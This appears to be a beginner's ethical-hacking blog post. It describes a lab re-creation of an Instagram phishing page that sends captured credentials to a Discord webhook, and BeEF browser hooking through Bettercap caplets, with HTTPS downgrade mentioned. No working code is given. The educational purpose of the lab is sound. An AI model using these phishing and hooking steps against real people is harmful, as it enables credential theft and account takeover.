Week 4 – Phishing, BeEF and a Side Of Vacation

What was this week was about?

As I mentioned before, this week was slow — I’m still on vacation. But I want to reassure you that I haven’t lost sight of my end goal. Once my vacation wraps up on August 14, I’ll hopefully have no other family commitments, and my full focus will be on driving this project forward.

This week’s goals:

• Show at least some progress in the course (~100 minutes or course content).

• Learn the basics of social media security and website hacking.

• Learn how one can protect oneself from falling victim to these attacks.

What I learned this week?

How Instagram Phishing Works?

Instagram phishing is an increasingly popular form of cyberattack as more people join social media platforms. With over a billion active users, Instagram provides a massive target base for malicious actors. A phishing attack on Instagram can compromise a victim’s privacy and personal data.

Here’s a step-by-step look at how it typically works:

1. Bait Email or Message – The attacker sends a realistic-looking email or direct message, persuading the victim to click on a link. The link often claims to offer benefits such as getting the victim’s account verified for free, which would allegedly increase post visibility.

2. Fake Login Page – The victim clicks the link and lands on a convincing replica of Instagram’s login page.

3. Credential Capture – The victim enters their username and password, believing it’s the real site.

4. Redirection to the Real Site – To avoid raising suspicion, the phishing site immediately redirects the victim to Instagram’s actual website after submission.

5. Credentials Sent to Attacker – Behind the scenes, the entered credentials are sent to the attacker, often via an instant messaging service like Discord.

How I Simulated the Attack on Myself (Educational Purposes Only)

To understand this attack better, I recreated it in a fully isolated virtual environment to ensure no real harm was caused. This was done strictly for educational purposes and should not be used for malicious activity.

Step-by-step process:

• Download the Script – I obtained an Instagram login page replica script from the resources of my Udemy course.

• Replace Web Server Content – I replaced the default index.html file in /var/www/html/ on my Kali Linux virtual machine with the Instawebhook phishing page script.

• Configure Webhook – I embedded my own Discord webhook URL into the script so that any captured credentials would be sent to my private Discord server.

• Start Web Server – I launched the Apache2 web server using the terminal.

• Access the Fake Page – On the same Kali machine, I visited the phishing page URL in a browser (acting as the “victim”).

• Enter Test Credentials – I entered a test username and password into the fake login form, which then redirected me to the actual Instagram website to maintain realism.

Receive Credentials – I checked my Discord server and confirmed that the entered credentials (my own, for testing purposes) were successfully sent via the webhook.

How I Hooked My Target Using BeEF and Bettercap

I hooked my target virtual machine by following these steps:

1. Start BeEF – I launched BeEF, which began running and listening for any webpages that could be hooked.

2. Configure the JavaScript Code – I inserted my Kali virtual machine’s IP address (the attacker’s IP) into the JavaScript snippet. This snippet calls the BeEF hook (hook.js) from my Kali VM whenever a </head> tag is detected in a webpage’s HTML.

3. Start Bettercap – I ran the custom BeEF caplet provided in my course resources. This caplet also contained the JavaScript hook code configured in the previous step.

4. Access an HTTP Webpage – I visited an HTTP webpage on my target virtual machine to simulate normal browsing. (Note: I could also have targeted an HTTPS page by running an additional caplet—hstshijack—which downgrades HTTPS to HTTP using HSTS bypass techniques.)

5. View Results – Upon opening BeEF’s control panel, I confirmed that my target virtual machine was successfully hooked.

Challenges I Faced

BeEF was able to hook my target, but whenever I attempted to run attacks against the victim virtual machine, they all failed.

How I (Tried to) Solve the Problems:

I created a basic HTML page containing only a simple JavaScript snippet to hook my target — in this case, my Windows virtual machine. Using the browser’s Inspect tool, I opened the console on the hooked page and ran:

typeof beef !== undefined

The result was true, confirming that the BeEF object existed in the context of the page.
Despite this, none of BeEF’s attack modules worked against the victim machine.

I even tried switching the browser used to open the hooked page, but the issue persisted.

(If anyone experienced with BeEF knows why this might happen or how to fix it, please share your insights in the comments!)

Next Week’s Goals:

• Show more progress in course than the last two weeks combined.

• Learn about external network attacks, fake game website attacks, post hacking sessions and more.

Finishing Up:

It’s been a month, and I’m still not at the point of actually building Project BlackBox. But that’s okay — projects like this aren’t sprints, they’re marathons. Every obstacle I hit is another skill I gain, another lesson I learn. My goal isn’t just to finish; it’s to grow into the kind of person who can finish something like this. The grind isn’t optional — it’s the whole point.

Disclaimer:

This blog documents my personal journey in learning ethical hacking and cybersecurity with the intent to build responsible AI tools for penetration testing and system defense.

All experiments are conducted in isolated lab environments on virtual machines I own or control. This project is strictly for educational and ethical purposes.

I do not condone or promote any form of unauthorized or illegal access to systems.